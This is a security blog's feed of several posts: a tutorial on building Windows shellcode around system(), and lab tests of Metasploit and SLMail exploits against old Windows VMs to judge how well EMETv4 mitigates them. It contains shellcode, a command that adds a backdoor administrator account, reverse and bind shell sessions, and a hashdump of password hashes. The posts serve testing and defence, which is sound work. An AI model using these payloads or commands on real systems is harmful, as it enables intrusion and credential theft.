Remote shell – GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Wed, 05 Feb 2014 11:11:29 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 Create a custom shellcode using System() function https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/ https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/#comments Mon, 20 Jan 2014 16:40:15 +0000 https://www.gosecure.it/blog/?p=452 read more)]]> Recently I have to write a custom shellcode that accommodate some specific features. Basically I have to avoid the use of some functions like WinExec() and ShellExecute() to create a remote code execution and insert it as payload in a test exploit.
I have to search some other function that allow me to execute command on a remote PC and I found it in the System() call function. I’m not a skilled developer, so what described below is my working solution, maybe not the better solution.

I’m not talking here about the exploit, but only about the shellcode creation and choices motivations. This exemple can be easly fit to other situations and replicated without inserting it in an exploit, but simply tested in a developer or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to popup a message

[BITS 32]

mov ebx, 0x00584148 ; Loads a null-terminated string “HAX” to ebx
push ebx ; pushes ebx to the stack
mov esi, esp ; saves null-terminated string “HAX” in esi
xor eax, eax ; Zero our eax (eax=0)
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value HAX\00)
push esi ; Push the second parameter (lpText) to the stack (value HAX\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x7E45058A ; Move the MessageBoxA address in to eax
call eax ; Call the MessageBoxA function with all parameters supplied.

Looking up the MessageBoxA function in Google reveals four arguments:

int MessageBox(
  HWND hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT uType
  );

So the sample code pushes in the stack all the arguments and then call the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is insered (\x00)
– the arguments are pushed in reverse order into the stack (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hadrcoded and works only on the Operating System the shellcode is written for.
– the hardcoded address doesn’t work in random space address context (ASLR or EMET)

Starting from this sample I want to use the System() function to pass commands to the interpreter (typically CMD.EXE); I search in MSDN specifications and I found that it needs only one parameter: the command I want to pass.

system(
  "echo A>%tmp%\xx.txt"
  );

First I have to determinate, using the debugger, if the function is loaded in memory, so in Olly I search for “Names in all modules” and, luckly I found it in the msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 1


Figure 2

Figure 2


Ok, now I have to convert the string “echo A>%tmp%\xx.txt” in hex, cut it in groups of 4 bytes and invert the order of the groups; also I have to remember to insert the NULL byte at the end of the hex string. These groups will be insered in the stack using the push command and then will group it adding a pointer to the stack.

root@bt:~# echo -ne 'echo A>%tmp%\xx.txt\x00' | xxd -ps | fold -w8 | tac
74787400
5c78782e
746d7025
20413e25
6563686f

So the testing shell code will be like this:

[BITS 32]

PUSH 0x74787400 ; push into the stack, in reverse order, the command 'echo A>%tmp%\xx.txt' adding a NULL byte
PUSH 0x5c78782e
PUSH 0x746d7025
PUSH 0x20413e25
PUSH 0x6563686f
MOV EDI,ESP ; adding a pointer to the stack
PUSH EDI
MOV EAX,0x77BF93C7 ; calling the System() function using the hardcoded address (XP SP3)
CALL EAX

Ok, now I have the test shellcode; I can do it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a brake point at the end of my code and run the program (Figure 3).
Remember that the msvcrt.dll must be one of the module loaded by the program attached to the debugger.

Figure 3

Figure 3


Once the shellcode is ended I verify its work: I go to %tmp% folder and search for the xx.txt file, if all is ok I can insert a better command like net user test Pa$$word1234 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add

Note that the net user/net localgroup need the admin privilege to be executed, so in a real exploit the target program must be started using elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

]]>
https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/feed/ 3
EMETv4 – Part 2 https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/ https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/#respond Mon, 24 Jun 2013 14:50:14 +0000 https://www.gosecure.it/blog/?p=169 read more)]]> [begin of phase 2] Take a look at the [phase 1]

I continue my tests about EMETv4. This time I’ve installed EMETv4 on the same machine HP-CLI01 and HP-SRV01 (note that framework 4 is required ). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is MSFConsolle ouput of the exploit:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                          Path
 ---   ----  ----               ----  -------     ----                          ----
 0     0     [System Process]         4294967295                                
 4     0     System             x86   0           NT AUTHORITY\SYSTEM          
 268   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 316   268   csrss.exe          x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 340   268   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 388   340   services.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 400   340   lsass.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 568   388   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 588   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 760   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 816   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 872   388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 888   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1160  888   wmiadap.exe        x86   0           NT AUTHORITY\SYSTEM           \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
 1164  388   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1200  388   msdtc.exe          x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1284  388   cisvc.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\cisvc.exe
 1344  388   dfssvc.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1376  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1460  388   inetinfo.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1480  388   ismserv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\ismserv.exe
 1500  388   ntfrs.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\ntfrs.exe
 1624  388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1664  388   SLadmin.exe        x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLadmin\SLadmin.exe
 1788  388   SLSmtp.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\slsmtp.exe
 1848  388   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1876  388   tcpsvcs.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\tcpsvcs.exe
 1964  388   SLMail.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\SLmail.exe
 2104  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2336  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2404  388   TPAutoConnSvc.exe  x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2464  388   dllhost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 2612  388   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 2644  588   wmiprvse.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2824  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 3060  588   wmiprvse.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 3380  3352  explorer.exe       x86   0           HP\Administrator              C:\WINDOWS\Explorer.EXE
 3444  2404  TPAutoConnect.exe  x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 3488  3380  vmtoolsd.exe       x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3596  388   msiexec.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\msiexec.exe
 3924  888   wuauclt.exe        x86   0           HP\Administrator              C:\WINDOWS\system32\wuauclt.exe
 4016  3560  EMET_Agent.exe     x86   0           HP\Administrator              C:\Program Files\EMET 4.0\EMET_Agent.exe


meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

The target is powned. Take a look at the process number 4016: 4016  3560  EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I setup the exploit exactly as test 2 but this time EMET works well and stops me.
When I start IE6 on the target machine and point to the evil page the aurora exploit cause the crash of Internet Exploter as wished. so I restart the target machine and retry: same result, IE6 crash. I want to double check this and I exclude iexplorer.exe from EMEC configuration and this time the exploit has worked.

This is a drow: exploit 1 – EMEC 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with defaul settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        388 K
csrss.exe                    604 Console                 0      4,172 K
winlogon.exe                 628 Console                 0      5,032 K
services.exe                 672 Console                 0      3,348 K
lsass.exe                    684 Console                 0      1,532 K
vmacthlp.exe                 844 Console                 0      2,328 K
svchost.exe                  860 Console                 0      4,860 K
svchost.exe                  944 Console                 0      4,348 K
svchost.exe                 1036 Console                 0     18,140 K
svchost.exe                 1092 Console                 0      3,340 K
svchost.exe                 1224 Console                 0      4,236 K
spoolsv.exe                 1536 Console                 0      5,568 K
explorer.exe                1556 Console                 0     18,664 K
vmtoolsd.exe                1688 Console                 0     13,560 K
SLadmin.exe                 2020 Console                 0      3,076 K
SLSmtp.exe                   272 Console                 0      4,720 K
vmtoolsd.exe                 324 Console                 0     11,396 K
TPAutoConnSvc.exe            312 Console                 0      3,868 K
wscntfy.exe                 1368 Console                 0      1,964 K
alg.exe                     1816 Console                 0      3,416 K
TPAutoConnect.exe           2448 Console                 0      4,048 K
wuauclt.exe                 3200 Console                 0      5,048 K
SLMail.exe                   564 Console                 0      4,940 K
msiexec.exe                 3768 Console                 0      8,256 K
EMET_Agent.exe              3752 Console                 0     27,960 K
cmd.exe                     3988 Console                 0      2,432 K
tasklist.exe                3980 Console                 0      4,076 K
wmiprvse.exe                1628 Console                 0      5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I modify the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the execution of code: the DEP block the execution from the address space. I double check it and retry my attack with basic settings: the exploit is not stopped. Also in this case let’s take 2 steps back and debug the application while EMET is blocking the execution (Image1)

Image 1

Image 1


The overflow works, writing “A” up to the overwriting of the EIP but when it has to execute the payload it is stopped with message “Access violanion when executing 01C7A154”. That is actualy the address where my payload start to be executed.

Conclusions
I consider the EMET idea extremly useful and I think that this program, if implemented, will be able to increase the system security. Nowaday the bigest problems, from my viewpoint, are:
– not all moules are present and activated (SEHOP e ASLR)
– not all installed programs are controlled by default
– On my tests, on Windows XP, I have a problem with the EMET_agent when start the GUI (image2) and when I reboot (image3).
– I would be happier if FrameWork4 is not a requirement.

Image 2

Image 2

Image 3

Image 3


In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolutions.

]]>
https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/feed/ 0
EMETv4 – Part 1 https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/ https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/#respond Thu, 20 Jun 2013 12:00:56 +0000 https://www.gosecure.it/blog/?p=132 read more)]]> The theory
Microsoft has relased the full edition of the free software EMETv4 “Enhanced Mitigation Experience Toolkit”. The Company puts together some tecnologies such ASLR and DEP to mitigate the risk of system hacking; first of all the “Zero day” attacks. This, thanks to DEP and ASLR, will not only patch Microsoft software, but all software installed. The DEP (Data Execution Prevention) is a technology that associates services or applications to non-executable memory region and blocks code executions from this area (buffer overflow). The ASLR (Address space layout randomization) randomize the address that the application use. If someone bypass the buffer overflow protection and write a script to exploit it, the return address he has to overwrite in the instruction pointer register (EIP or RIP) to redirect the exploit to the payload, is everytime different. This makes considerably more difficult the replica of the exploit.
Well, this is what I understand…therefore there is no other options, I have to test it.

The practice
I will test 3 attacks:
– To Operating system vulnerability (SMB)
– To Microsoft software (IE6)
– To non Microsoft Software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both Operating systems and vulnerability are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown one. So let’s start the phase 1: system without EMETv4.

Test 1
Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework Consolle running on Linux machine:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

References:
  https://cvedetails.com/cve/2008-4250/
  https://www.osvdb.org/49243
  https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo        
systeminfo

Host Name:                 HP-SRV01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Uniprocessor Free
Registered Owner:          hp
Registered Organization:   hp
Product ID:                69713-650-3699384-45501
Original Install Date:     1/20/2013, 12:26:37 AM
System Up Time:            0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory:     511 MB
Available Physical Memory: 305 MB
Page File: Max Size:       1,044 MB
Page File: Available:      844 MB
Page File: In Use:         200 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    hp.local
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: SP1 - SP
                           [03]: KB914961 - Service Pack
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 succesfull

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start a http server with evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /evil            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.34.132   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*]  Local IP: https://192.168.34.132:8080/evil
msf  exploit(ms10_002_aurora) > [*] Server started.
...
...

Now in the target machine I start Internet Explorer 6, browse to the evil page and the msf consolle continues:

...
...
[*] 192.168.34.134   ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf  exploit(ms10_002_aurora) > sessions

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter x86/win32  HP-CLI01\user @ HP-CLI01  192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf  exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-CLI01
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5d193c1fc3224fbbbc410375cbf57593:cb30aaad8dc109ef9521bfa868237ee3:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9fc1f511ad19c511fd4e162ca71fd236:::
user:1003:22124ea690b83bfbaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\HP-CLI01
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 succesfull

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

The payload of the exploit was a bind shell on port 4444, indeed a TCP listener is now working this port.
On the Linux machine I am able to connect to this listener a get a remore shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot is the exploit in acrion:

Image 1

Image 1


Let’s go back of some steps and debug the exploit and look at image 2.
Image 2

Image 2


The EIP is overwritten after 4654 bytes of space (\x41 ASCII A) and, in the 4 bytes of the EIP (\x42 ASCII B), I will put the return address ‘\x53\x93\x42\x7E’ that will point to exact space address of user32.dll. This will surelly work only under the same OS version (every Windows XP sp3 eng); that is where the user32.dll version and address space is the same.
If I understend how EMET works, it will often change the spece address of user32.dll de facto invalidating the exploit. Or better causing the application crash.

[end of phase 1] Take a look at the [phase 2]

]]>
https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/feed/ 0
From a non interactive shell to an interactive one https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/ https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/#respond Tue, 18 Jun 2013 10:08:59 +0000 https://www.gosecure.it/blog/?p=118 read more)]]> As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
